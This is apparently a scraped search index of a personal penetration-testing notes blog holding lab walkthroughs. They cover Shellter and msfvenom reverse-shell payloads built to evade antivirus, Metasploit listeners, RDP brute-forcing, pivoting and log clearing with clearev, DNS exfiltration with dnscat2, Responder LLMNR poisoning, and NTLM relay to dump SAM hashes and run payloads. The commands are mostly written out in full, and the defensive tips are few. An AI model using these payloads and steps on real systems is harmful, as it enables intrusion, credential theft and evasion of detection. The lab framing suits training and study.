logged, by firewalls and intrusion detection systems\n\u003cimg alt=\"as_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/03/as_1.png\"\u003e\u003c/p\u003e","title":"Active Scanning Techniques"},{"content":"THE ONION ROUTER: The Onion Router (TOR) is a service and special network that allows users to gain anonymity when browsing the internet and accessing the dark web. TOR functions a little like proxy chaining, but it is considerably more complex. Traffic is wrapped in a separate layer of encryption for each relay in the circuit, so no single relay knows both the source and the destination of a connection. Install tor: sudo apt update \u0026amp;\u0026amp; sudo apt install tor Configuring the proxychains4 config file: sudo vim /etc/proxychains4.conf Go to the end of the file, where the proxy servers are listed, and edit it as shown. Keep in mind that proxychains works by LD_PRELOAD, so it only redirects TCP connections of dynamically linked programs, and DNS lookups still leak unless proxy_dns is enabled in the same file. Then save and exit using :wq Use these two commands to start Tor and check its status: 
check tor connection ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/03-tor/","summary":"\u003ch2 id=\"the-onion-router\"\u003eTHE ONION ROUTER:\u003c/h2\u003e\n\u003cp\u003eThe Onion Router (TOR) is a service and special network that allows users to gain anonymity when browsing the internet and accessing the dark web. TOR functions a little like proxy chaining, but it is considerably more complex. Traffic is wrapped in a separate layer of encryption for each relay in the circuit, so no single relay knows both the source and the destination of a connection.\n\u003cimg alt=\"tor_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/03/tor_1.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"install-tor\"\u003eInstall tor:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo apt update \u003cspan class=\"o\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e sudo apt install tor\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col\u003e\n\u003cli\u003eConfiguring the \u003ccode\u003eproxychains4\u003c/code\u003e config file:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo vim /etc/proxychains4.conf\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eGo to the end of the file, where the proxy servers are listed, and edit it as shown: \u003cimg alt=\"tor_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/03/tor_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eThen save and exit using \u003ccode\u003e:wq\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eUse these two commands to 
start Tor and check its status: \u003cimg alt=\"tor_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/03/tor_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003echeck tor connection\n\u003cimg alt=\"tor_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/03/tor_4.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e","title":"Anonymity with TOR"},{"content":"Shellter is an antimalware evasion tool that is commonly used by ethical hackers and penetration testers to automate the process of creating and encoding custom payloads to evade threat detection systems. Shellter handles the generation of shellcode and injects it into a trusted Microsoft Windows 32-bit application. When the custom payload is executed on a targeted system, the trusted program runs as it normally would, while the injected shellcode executes in the background within the same process\u0026rsquo;s memory.\nInstallation: sudo apt update sudo apt install shellter Configuration of shellter:\nconfigure the working environment for Shellter and install Wine32: sudo dpkg --add-architecture i386 sudo apt update sudo apt install wine32 List all the windows binaries in kali linux: ls -l /usr/share/windows-binaries/ Next, let’s use the following commands to copy the vncviewer.exe file to our current working directory, as it’s perceived as a harmless file: cp /usr/share/windows-binaries/vncviewer.exe /home/kali Restart the machine once so that the i386 and Wine32 changes made above take effect. using shellter: Next, use the following command to launch the Shellter application on Kali Linux: sudo shellter 
Next, when the Shellter window appears, you will be provided with the option to use Shellter in automatic or manual mode; type A and hit Enter to apply automatic mode: Note In automatic mode, Shellter dynamically analyzes the Portable Executable (PE) file to identify a suitable injection point, whereas manual mode offers more control to the user.\nspecify the vncviewer.exe file within the /home/kali/ directory Note To learn more about the PE format, please visit https://learn.microsoft.com/en-us/windows/win32/debug/pe-format.\nShellter will determine where it can inject shellcode within the PE file. Once this process is completed, type Y and hit Enter to enable stealth mode (the original program keeps working, so the user sees nothing unusual), choose L for Listed payloads, then choose meterpreter_reverse_tcp by index 1, then set LHOST and LPORT: After completion press Enter, then: Upload the encoded vncviewer.exe to VirusTotal for analysis. Keep in mind that VirusTotal shares submitted samples with antivirus vendors, so never upload a payload you intend to use on a real engagement. Setting up a Meterpreter listener: kali@kali:~$ msfconsole msf6 \u0026gt; use exploit/multi/handler msf6 exploit(multi/handler) \u0026gt; set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) \u0026gt; set LHOST 172.30.1.50 msf6 exploit(multi/handler) \u0026gt; set LPORT 5678 msf6 exploit(multi/handler) \u0026gt; set AutoRunScript post/windows/manage/migrate msf6 exploit(multi/handler) \u0026gt; exploit COMMAND BREAKDOWN:\nThe windows/meterpreter/reverse_tcp payload ensures that, when a connection is detected, Metasploit will send this (staged) payload to the targeted system, which will execute within memory and create a reverse shell back to the Kali Linux machine. The LHOST and LPORT parameters are used to set the local IP address and listening port on Kali Linux; they must match the values entered in Shellter. The AutoRunScript post/windows/manage/migrate command ensures that, once a connection has been established from the victim system to Kali Linux, Metasploit will automatically migrate the Meterpreter session into another process, so it survives if the original program is closed and is harder to spot. 
The exploit command is used to execute a payload or exploit module within Metasploit. Delivery: Delivering the vncviewer.exe payload to our Windows 10 Enterprise machine THESPIDERMAN We will use Python\u0026rsquo;s built-in http.server module for that; run the following command from the directory that contains vncviewer.exe: python3 -m http.server 8000 On the target Windows machine, open a browser and go to the Kali machine\u0026rsquo;s IP on port 8000 (my Kali is on the 172.30.1.0/24 network). The Python web server lets us download files from the Kali Linux machine onto other systems within our lab environment. Download the file and execute it. We will get a reverse shell back to our listener: Important Not all Windows-based executables will work with Shellter. When working with Shellter, it is important to ensure the PE file that is encoded with shellcode from Shellter executes long enough on the targeted system for the staged payload to be delivered from Kali Linux to the target. Keep in mind that executables that are heavily protected or use non-standard PE structures might pose challenges.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/06-understading-network-pentesing/03-creating-custom-payloads-with-shelter/","summary":"\u003cp\u003e\u003ccode\u003eShellter\u003c/code\u003e is an \u003ccode\u003eantimalware evasion\u003c/code\u003e tool that is commonly used by ethical hackers and penetration testers to automate the process of creating and encoding custom payloads to evade threat detection systems. Shellter handles the generation of shellcode and injects it into a trusted Microsoft Windows 32-bit application. 
When the custom payload is executed on a targeted system, the trusted program runs as it normally would, while the injected shellcode executes in the background within the same process\u0026rsquo;s memory.\u003c/p\u003e","title":"Creating Custom Payloads With Shelter"},{"content":" First we will enable RDP on our EXTERNAL-RED domain controller, a Windows Server 2019. Fire up the VM and open Server Manager: Refresh the page; Remote Desktop should now show Enabled Imagine if a threat actor or penetration tester could retrieve valid user credentials to access the root Domain Controller (DC) of an organization. Here, the threat actor could potentially take over and control the Windows domain environment, such as its policies, users, groups, and device accounts. Additionally, a threat actor can attempt to gain unauthorized access to client systems that use shared user credentials that are connected to the company’s domain through RDP and further set up persistent access to each compromised device to expand their foothold on the network. Let\u0026rsquo;s start exploiting: Open Kali First check whether the target is visible on the network: nmap -sn 192.168.83.0/24 --exclude 192.168.83.128 Identify whether RDP is running on the target 192.168.83.140\nnmap -p 3389 192.168.83.140 Port 3389 is the default port for the RDP service on Windows. Next, use Ncrack to perform an online password attack against the RDP service on the target, with the intention of identifying valid user credentials for the service. Check the domain\u0026rsquo;s account lockout threshold first and keep the timing template (-T) low, otherwise the attack will lock the account you are testing:\nncrack -v -T 3 -u sysadmin -P /home/kali/win_2k19_passes.txt rdp://192.168.83.140 # for domain-level accounts ncrack -v -T 3 -u .\\\\sysadmin -P /home/kali/win_2k19_passes.txt rdp://192.168.83.140 # for local accounts The results show that simply enabling the RDP service is not enough for this to work, because modern Windows servers enforce NLA (Network Level Authentication). 
With NLA enabled, the server requires the client to authenticate (through CredSSP) before it even shows the logon screen. A brute-force tool whose RDP module does not implement CredSSP fails before a single password can be attempted. We will temporarily disable NLA and retry; re-enable it once the exercise is over, since without NLA the logon screen is exposed to unauthenticated clients.\nDisabling NLA: On your Windows Server, open the \u0026ldquo;Run\u0026rdquo; dialog (Windows Key + R). Type sysdm.cpl and press Enter. Go to the Remote tab. Uncheck the box that says \u0026quot;Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)\u0026quot;. Click OK or Apply. Using hydra hydra -l .\\\\sysadmin -P /home/kali/win_2k19_passes.txt 192.168.83.140 rdp -V -f -t 4 # for local accounts hydra -l sysadmin -P /home/kali/win_2k19_passes.txt 192.168.83.140 rdp -V -f -t 4 # for domain-level accounts such as the DC administrator None of the tools worked in my scenario, and this may happen in the real world too. One of the reasons I can think of is that the user is not a local admin, which is why RDP is denying us access. Let me show you with the rdesktop command.\nTrying rdesktop: rdesktop -u \u0026#39;.\\sysadmin\u0026#39; -p \u0026#39;Password123\u0026#39; 192.168.83.140 Let\u0026rsquo;s add sysadmin to the Remote Desktop Users group. 
On your Windows Server, open a command prompt as administrator and run: net localgroup \u0026#34;Remote Desktop Users\u0026#34; \u0026#34;UserName\u0026#34; /add For domain users use this command:\nnet localgroup \u0026#34;Remote Desktop Users\u0026#34; \u0026#34;DomainName\\UserName\u0026#34; /add PowerShell commands:\n# for local users Add-LocalGroupMember -Group \u0026#34;Remote Desktop Users\u0026#34; -Member \u0026#34;UserName\u0026#34; # for domain users Add-LocalGroupMember -Group \u0026#34;Remote Desktop Users\u0026#34; -Member \u0026#34;DomainName\\UserName\u0026#34; If it still fails, make sure the group has been granted the logon right here (on a domain controller this right is granted to Administrators only by default, so group membership alone is not enough): TO FIND THIS PATH: Press Windows Key + R, type gpedit.msc, and press Enter. In the left pane, navigate to this exact path: Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment In the right pane, find and double-click the policy named \u0026quot;Allow log on through Remote Desktop Services\u0026quot;. If Remote Desktop Users is not in the list, click Add User or Group, type Remote Desktop Users -\u0026gt; Check Names -\u0026gt; Apply ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/03-exploiting-rdp/","summary":"\u003col\u003e\n\u003cli\u003eFirst we will enable RDP on our EXTERNAL-RED domain controller, a Windows Server 2019.\u003c/li\u003e\n\u003cli\u003eFire up the VM and open \u003ccode\u003eserver manager\u003c/code\u003e :\n\u003cimg alt=\"rdp_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/03/rdp_1.png\"\u003e\nRefresh the page; Remote Desktop should now show \u003ccode\u003eenabled\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cul\u003e\n\u003cli\u003eImagine if a threat actor or penetration tester could retrieve valid user credentials to access the root Domain Controller (DC) of an organization. 
Here, the threat actor could potentially take over and control the Windows domain environment, such as its policies, users, groups, and device accounts. Additionally, a threat actor can attempt to gain unauthorized access to client systems that use shared user credentials that are connected to the company’s domain through RDP and further set up persistent access to each compromised device to expand their foothold on the network.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"lets-start-exploiting\"\u003eLet\u0026rsquo;s start exploiting:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eOpen kali\u003c/li\u003e\n\u003cli\u003eLet\u0026rsquo;s do a formal check if the target is visible on the network or not:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sn 192.168.83.0/24 --exclude 192.168.83.128\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"rdp_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/03/rdp_2.png\"\u003e\n3. Identifying if \u003ccode\u003eRDP\u003c/code\u003e is running on the target \u003ccode\u003e192.168.83.140\u003c/code\u003e\u003c/p\u003e","title":"Exploiting RDP"},{"content":"Lateral Movement and Pivoting: Lateral movement allows the penetration tester to move further into the targeted network while discovering additional assets and exploiting security vulnerabilities on remote systems with the intent of stealing confidential data and expanding a foothold. Within many organizations, their network is usually segmented with routers and firewalls to prevent cyber-attacks and threats from propagating through their organization. 
However, there are various host devices that are configured with a dual-homed network connection, which simply allows the host to be connected to two different IP networks at the same time.\n2. Our target will be the Blue VM first.\n3. Fire up the Blue VM and the Kali machine.\n4. Exploit it and get a shell using the ms17-010 exploit.\n5. On the Meterpreter session, use the arp command to view the entries within the Address Resolution Protocol (ARP) cache of the compromised target. The ARP cache contains a list of IP-to-MAC address bindings of all the host devices that recently transmitted a message between themselves and the compromised host:\nmeterpreter> arp\nWe can see that the target machine is on two networks: one is the NAT network aka PENTEST-NET (192.168.83.0/24) and the other is 172.30.1.0/24 (PIVOT-NET).\n6. Next, use the ipconfig command within Meterpreter to view a list of network adapters and their IP addresses. In the screenshot we can see that interface 17 is connected to a different subnet.\nAdditionally, you can use the route command to check whether the compromised system has a network route that is otherwise unreachable from your attacker machine (Kali Linux). The host has a network route to 172.30.1.0/24.\nAdd a route from our Kali machine to the 172.30.1.0/24 subnet. To do that we will use the Metasploit module named post/multi/manage/autoroute.\nBackground the session; we will then run a port scan through Metasploit itself to determine whether we can reach the target network now.\nClearing tracks: Every action that occurs on a host is recorded in the form of a log message used to keep track of events for accountability. This means that if a penetration tester performs any action on a compromised host, logs are also generated indicating the actions performed. Such logs are useful to cybersecurity analysts and incident responders, who gather evidence from a compromised system to determine what happened during a cyber-attack. 
For instance, cybersecurity analysts and incident responders not only gather evidence from logs but also analyze them to identify patterns of malicious activity, indicators of compromise (IoCs), and potential vulnerabilities.\nFor this we will use a built-in Meterpreter command, clearev.\nData encoding and exfiltration: Encoding using exe2hex:\n1. We will encode the vncviewer.exe payload we previously built with msfvenom; this time we will use the SPIDERMAN machine for getting a shell back. COMMAND:\n/usr/bin/exe2hex -x vncviewer.exe\n2. Set up the multi handler in Metasploit. Make sure you enter the same port you used when inserting the malicious payload into vncviewer.exe.\n3. Transfer the payload to the SPIDERMAN machine through a Python web server:\n# in kali\npython3 -m http.server 8000\n4. Open up SPIDERMAN and open Command Prompt as admin, then use these commands:\nC:\\Users\\peterparker> powershell\nPS C:\\Users\\peterparker> Invoke-WebRequest -Uri http://172.30.1.50:8000/vncviewer.cmd -OutFile C:\\Users\\peterparker\\Downloads\\vncviewer.cmd\nDisable Windows Defender real-time protection on Windows to allow the ASCII file to reassemble into its original form. During the reassembly of the file, Windows Defender may detect it as a potentially dangerous file and block it.\n5. Execute the vncviewer.cmd file. You'll begin to notice the ASCII code reassembling into an executable file:\nC:\\Users\\peterparker\\Downloads> .\\vncviewer.cmd\nOnce the reassembly is done, execute the .exe. You should get a session back.\nNow we will perform the same data exfil inside the Blue VM but remotely, without accessing the GUI:\nGet a Meterpreter shell first. Move to the root directory of the machine. Upload vncviewer.cmd and vncviewer.exe. Then open a shell to check that both files are present. Then execute the .cmd file first using the command vncviewer.cmd: it will start reassembling the binary. 
It will complete by giving this output: Make sure your multi handler is running in a different tab. Then execute the .exe and you will get a session back. After compromising the system and obtaining a shell, use the post/multi/recon/local_exploit_suggester module to let Metasploit check whether the compromised system is vulnerable to other exploitation modules. To enumerate and decrypt the Local Security Authority (LSA) secrets from the registry of the compromised system, use the following commands: Having completed this exercise, you have learned how to convert a malicious payload into ASCII to reduce threat detection and evade security sensors. In the next lab, you will discover how to perform data exfiltration using DNS messages to evade detection.\nNote: The next steps are all failed attempts; if you still want to follow them, you can. If you are using the lab setup provided in the first part, these techniques can work. In my case I performed these techniques when I didn't have any proper lab structure or lab-building knowledge. I can update the techniques in future.\nExfiltration using PacketWhisper: Setting up the environment:\n1. On Kali Linux, open a terminal and use the following commands to download the PacketWhisper repository and its compressed ZIP file:\ngit clone https://github.com/TryCatchHCF/PacketWhisper\nwget https://github.com/TryCatchHCF/PacketWhisper/archive/refs/heads/master.zip\n2. You will need to download Python 2.7.18 and install it on the THESPIDERMAN virtual machine. To do that I will download the installer on Kali and transfer it together with the other files:\nwget https://www.python.org/ftp/python/2.7.18/python-2.7.18.amd64.msi\n3. Now run the Python HTTP server on Kali, then head over to THESPIDERMAN, open the browser and enter your Kali IP. Then download the files. Make sure you turned off real-time detection before downloading these files; Windows AV may interrupt the download.\n4. Then extract master.zip first. 
Then set up Python 2.7.18 by running the installer.\n5. After the initial setup, let's add Python 2.7.18 to the PATH environment variable. To do so, open the search bar and type system variables.\n6. Open it -> click on Environment Variables -> from the System variables tab click on Path -> click Edit -> click New and add the Python paths there.\nChanging the DNS settings of Windows Server 2019: We need to make our Kali VM the DNS server of this machine. Follow the given screenshot to do so, then confirm that the DNS server has been set.\nPerforming data exfiltration:\n1. On Kali Linux, open the terminal and use the following command to run tcpdump, a command-line packet-capturing tool, to collect the DNS messages incoming on the eth2 adapter that's connected to the 172.30.1.0/24 network:\nsudo tcpdump -i eth2 -w exfiltration.pcap\n2. Next, on the THESPIDERMAN machine, create a new text file within the extracted master.zip folder. Name the text file Passwords.txt and insert a few random passwords, as shown.\nI tried this tool on this separate network and it appears to be not working in my case, maybe because it's not my NAT / it needs DNS to Google for lookups as my Kali doesn't know the DNS lookup addresses.\nNow I will try the same in my NAT network on the Windows Server 2019 machine.\nFailed for Windows Server 2019 also. Let's start with the execution phase I did:\n1. Log in as administrator on your target machine; in my case it's Windows Server 2019 on my NAT network aka PENTEST-NET.\n2. Then go to the directory of the master folder.\n3. After that we will use Python 2 to run the script:\npython packetwhisper.py\n4. Make sure your listener is running. Also make sure you set up the DNS server with your Kali IP according to the network interface; in my case right now my target machine is on NAT, so I am using the class C IP of my Kali machine.\n5. The PacketWhisper main menu will open up; follow the given screenshots for the suitable options.\n6. Now onto my listener on Kali.\n7. Copy the captured traffic file to the PacketWhisper directory, wherever you have downloaded it.\n8. Then use the following screenshots for further assistance; before that, change your directory to the PacketWhisper directory.\n9. Now cat out the file; in my case I have received gibberish data.\nTrying to use dnscat2: Installing dependencies for dnscat2: Open a terminal on Kali and follow these commands:\nsudo apt update\nsudo apt install git ruby-dev build-essential\nsudo gem install bundler\ngit clone https://github.com/iagox86/dnscat2.git\ncd dnscat2/server/\nsudo bundle install\nInstall the Windows version of dnscat2 by cloning the dnscat2-powershell git repo. Then start the Python HTTP server and transfer the dnscat2 PowerShell script.\nExecution: On Kali set up the server:\ncd dnscat2/server\nsudo ruby ./dnscat2.rb mylab.local --no-cache\nThen copy the secret it prints. Come to the Windows machine and run these commands:\n# Bypass the script blocker for this one time\nSet-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process\n# Run the client\n.\\dnscat2.ps1 -Domain mylab.local -Secret [the-new-secret-key-from-your-server]\nYou can face some problems just like I faced; try to open the firewall port on the Kali machine for incoming connections on port 53 using the command sudo ufw allow 53/udp, then check the status using the command sudo ufw status verbose. To troubleshoot further issues you can check whether the packets are arriving on port 53 or not using the following technique:\n# on kali run this command:\nsudo tcpdump -i eth0 -n udp port 53 and src host 192.168.83.140 {the target machine's ip}\n# on target machine\nnslookup test.mylab.local 192.168.83.128 {kali ip}\nIf an error occurs from the target's side, remember to test this technique while your dnscat2 server is running on Kali. I WILL LATER ON ADD MORE STUFF ON THESE DNS RELATED ATTACKS. 
","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/03-lateral-movement-and-pivoting/","title":"Lateral Movement and Pivoting"},{"content":"While this section focuses on exploiting the trust of the Active Directory roles and services within a Windows environment, there are several types of attacks, such as pass-the-hash, that exploit the security vulnerabilities found within the protocols of the Transmission Control Protocol/Internet Protocol (TCP/IP) protocol suite. When we talk about TCP/IP, we are often referring to network-related technologies and devices. However, the protocols within TCP/IP can be found in the operating system and the applications running on a host device as well.\nExploiting LLMNR and NetBIOS-NS: In many organizations, we will find that they are using Windows Server as their Domain Controller (with the AD DS role installed). 
Additionally, Active Directory allows IT professionals to use GPOs to assign privileges to end devices and users, thereby creating restrictions to prevent unauthorized activities and actions from occurring in the domain.\nNote: When using the Active Directory Domain Services role, by default it uses LDAP, which is an insecure directory access protocol.\nWithin a Windows environment, you will commonly find both the Network Basic Input/Output System Name Service (NetBIOS-NS) and Link-Local Multicast Name Resolution (LLMNR) protocols. NetBIOS-NS is a network protocol commonly used on Local Area Networks (LANs) to resolve the hostnames of other devices within the same network. However, NetBIOS has been around for a very long time, and it is considered to be very outdated. While it is now a legacy protocol, it can still be found on many organizations' internal networks. In modern enterprise networks, with Windows operating systems as clients and servers, you will find that LLMNR is enabled by default where there are no Domain Name System (DNS) servers present or available on the network. LLMNR shares similarities with its predecessor, NetBIOS-NS, as they are both used to resolve hostnames on a network. While many medium-sized to large corporate networks have one or more internal DNS servers, LLMNR is still enabled by default on Windows operating systems. Both protocols can be exploited for attacks like spoofing and poisoning. Attackers can respond to LLMNR/NetBIOS-NS queries with false information, potentially redirecting traffic to malicious hosts.\nWe will use a tool called Responder, which listens for LLMNR, NBT-NS, and DNS messages on a network and replies to any systems sending these types of messages, in the order listed. Responder simply allows Kali Linux to capture these messages and provide a fake response to clients on the network.\nPractical: Fire up Kali Linux and determine on which interface THEPUNISHER and WINDOWS SERVER 2022 are. 
In my case it's on 10.11.12.0/24.\nRun Responder using the following command:\nsudo responder -I eth1 -dPv\nCOMMAND BREAKDOWN:\n-I: specifies the interface on which to listen and send malicious responses.\n-d: enables NetBIOS replies for domain suffix queries on the network.\n-P / --ProxyAuth: forces NTLM/Basic authentication for the proxy. The WPAD/-w option doesn't need to be on.\n-v: verbose mode.\nThen open your Windows Server, press Win + R and type the IP address of your Kali machine like this: \\\\kali_ip (you can write anything after the \\\\, for example \\\\fileserver). Windows will not find the file share and will send a broadcast message on the network that will eventually be captured by Responder. A path such as \\\\kali_ip is called a UNC (Universal Naming Convention) path. You will also be prompted for your user's credentials; provide them too (thanks to the -P option). The moment you provide the credentials, Responder will capture the NTLMv1/v2 hash of the password. Save the hash inside a file. Then use hashcat to determine the mode number for NTLMv2 cracking and crack it; follow the steps (we need the NTLMv2 one). Use the following hashcat command for cracking:\nhashcat -m 5600 hash_file.txt /usr/share/wordlists/rockyou.txt -O\nTo see the cracked password separately, use the following command:\nhashcat -m 5600 fcastle_hash.txt /usr/share/wordlists/rockyou.txt --show\nImportant: The Windows operating system stores local users' passwords in the form of NTLM hashes, either NTLMv1 or NTLMv2, depending on the version of Microsoft Windows and its configuration. However, when Windows needs to send these passwords across a network, it uses NTLMv2 and not NTLMv1. Keep in mind that you can perform pass-the-hash techniques using both NTLMv1 and NTLMv2 password hashes on a network. 
While NTLMv2 is considered more secure, threat actors can still exploit it to perform NTLM relay and password-cracking attacks to gain unauthorized access to systems on networks.\nNote: In a real-world penetration test or red teaming exercise, you will need a dedicated password-cracking system with a dedicated Graphics Processing Unit (GPU) and Hashcat on the host operating system. This enables Hashcat to fully leverage the GPU for offline password cracking. GPUs are highly efficient at performing the types of parallel computations necessary for password cracking, significantly reducing the time required to crack passwords compared to using a CPU alone. This efficiency is due to the architecture of GPUs, which can perform thousands of simple calculations simultaneously.\nHow to secure networks against LLMNR / NBT-NS poisoning attacks:\nDisable NetBIOS Name Service: There appears to be no way to disable the NetBIOS Name Service using a GPO; manual instructions are below.\n1. Open Control Panel\\Network and Internet\\Network Connections.\n2. Right-click on the network interface, select Properties, and double-click on \"Internet Protocol Version 4 (TCP/IPv4)\".\n3. On the next screen, click Advanced, then select the WINS tab.\n4. Click the radio button next to \"Disable NetBIOS over TCP/IP\".\nDisable LLMNR:\n1. Start => Run => gpedit.msc\n2. Open \"Local Computer Policy\" => \"Computer Configuration\" => \"Administrative Templates\" => \"Network\" => \"DNS Client\".\n3. Click on \"Turn Off Multicast Name Resolution\" and set it to \"Enabled\".\nExploiting SMB and NTLMv2 within AD: The Server Message Block (SMB) protocol is a common network protocol that lets devices share resources like files and printers across a network. Within an enterprise network, you will often discover there are many shared network drives mapped to employees' computers. 
This allows users to share files across the entire organization easily.\nRetrieving the SAM database: To start, we'll exploit the trust between Windows hosts on a network and retrieve the contents of the SAM database of a host over SMB. By retrieving the contents of the SAM database, you'll have access to the usernames and the NTLM hashes of each local user account. You can perform offline password cracking to identify the plaintext passwords for each user or perform pass-the-hash to access other systems on the network that use shared user credentials.\n1. Power on Kali, THEPUNISHER, THESPIDERMAN and Winserver 2022.\n2. Run the following NSE command to check whether SMB version 2 message signing is enabled and, if enabled, whether it is required:\nnmap --script smb2-security-mode -p 445 10.11.12.0/24\n3. As shown in the screenshot, message signing is not required on the THEPUNISHER machine.\n4. Next, we will need to use Responder once more. However, this time we do not want Responder to respond to any SMB and HTTP messages that are sent from clients on the network, only listen for them. Use the following command to open the responder.conf file and make the basic changes (turn the SMB and HTTP servers off):\nsudo vim /etc/responder/responder.conf\n5. After that, run Responder as we did earlier.\n6. Next, we will be using Impacket to perform an NTLM relay attack by capturing the domain user credentials from THESPIDERMAN and relaying them to THEPUNISHER. This will allow us to capture the user accounts within the SAM database on THEPUNISHER. But there is a catch: there has to be a common local user / domain user / local admin on those 2 devices; only then can we relay the captured local admin's credentials from THESPIDERMAN to THEPUNISHER, which will let us dump the SAM hashes.\n7. Use the following command to set the target as the THEPUNISHER machine:\nimpacket-ntlmrelayx -t 172.30.1.128 -smb2support # I have put the IP of the THEPUNISHER machine\n8. 
NTLM relay attacks are possible when a user account is shared between systems on a network, such as a local user account and even domain users.\nImportant: When using the Impacket ntlmrelayx.py script, the -t syntax allows you to specify a single target. However, in a large organization, you will want to create a text file containing a list of IP addresses for all the host systems that have their SMB security mode set to message signing enabled but not required. This file can be passed using the -tf option for simplicity during a penetration test.\nIn a real penetration test engagement, you will need to wait for a user to trigger an event on the network. However, within our lab, there are no other users to perform such events. So log in to the THESPIDERMAN machine as a local user / local admin; I have a common password between the local admins of both devices, so I will use that account. Once you are logged in, press Win + R and type in Kali's IP address just like we did earlier. At this moment the SAM dump has been performed and you can see the results in your ntlmrelayx tab.\n1. Add the hashes to a file.\n2. Use the following command to clean up the data and get the NTLM hashes:\ncut -d \":\" -f 4 file_name.txt\nCOMMAND BRIEF:\n-d: specifies the delimiter, in quotation marks. For instance, -d \":\" specifies to locate the colon (:) character within the samdump.txt file.\n-f: specifies the field to retrieve between the delimiters. For instance, -f 4 retrieves the fourth field, which holds the hashes.\nCracking the hash:\n3. Find the hashcat mode number for NTLM:\nhashcat -h | grep NTLM\n4. Crack the hash using the following command:\nhashcat -m 1000 sam_dump_NTLMV1_THEPUNISHER.txt /usr/share/wordlists/rockyou.txt\n
These are the 2 passwords we have cracked till now:\nObtaining a reverse shell: We'll be creating a malicious payload using MSFvenom to gain a reverse shell and using Metasploit to create a listener for capturing the return connection from the victim. Additionally, we'll be using both Responder and Impacket to capture the responses and perform an NTLM relay attack on the target.\n1. Open your Kali, THEPUNISHER and THESPIDERMAN machines.\n2. On Kali, open msfconsole and start the multi handler with the following commands:\nsudo msfconsole\nmsf > use multi/handler\n[*] Using configured payload generic/shell_reverse_tcp\nmsf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp\npayload => windows/meterpreter/reverse_tcp\nmsf exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate\nAutoRunScript => post/windows/manage/migrate\nmsf exploit(multi/handler) > set LHOST 172.30.1.130\nLHOST => 172.30.1.130\nmsf exploit(multi/handler) > set LPORT 1234\nLPORT => 1234\nmsf exploit(multi/handler) > exploit\n3. Make sure you have allowed incoming connections on that LPORT.\n4. Now we will make a payload using msfvenom and encode it using shikata_ga_nai with 9 iterations:\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.130 LPORT=1234 -f exe -o PUNISHER.exe -e x86/shikata_ga_nai -i 9\nMake sure you have given the proper LHOST and LPORT according to the multi handler.\n5. Start Responder on the correct network adapter.\n6. Now we will use ntlmrelayx to relay the local admin's authentication collected from the SPIDERMAN machine to the PUNISHER machine along with the payload execution, which will give us back a reverse connection:\nimpacket-ntlmrelayx -t 172.30.1.128 -smb2support -e PUNISHER.exe\nPerform the network trigger by accessing a file share from the SPIDERMAN machine.\n7. ntlmrelayx will do its job by creating a service and executing the payload.\n8. 
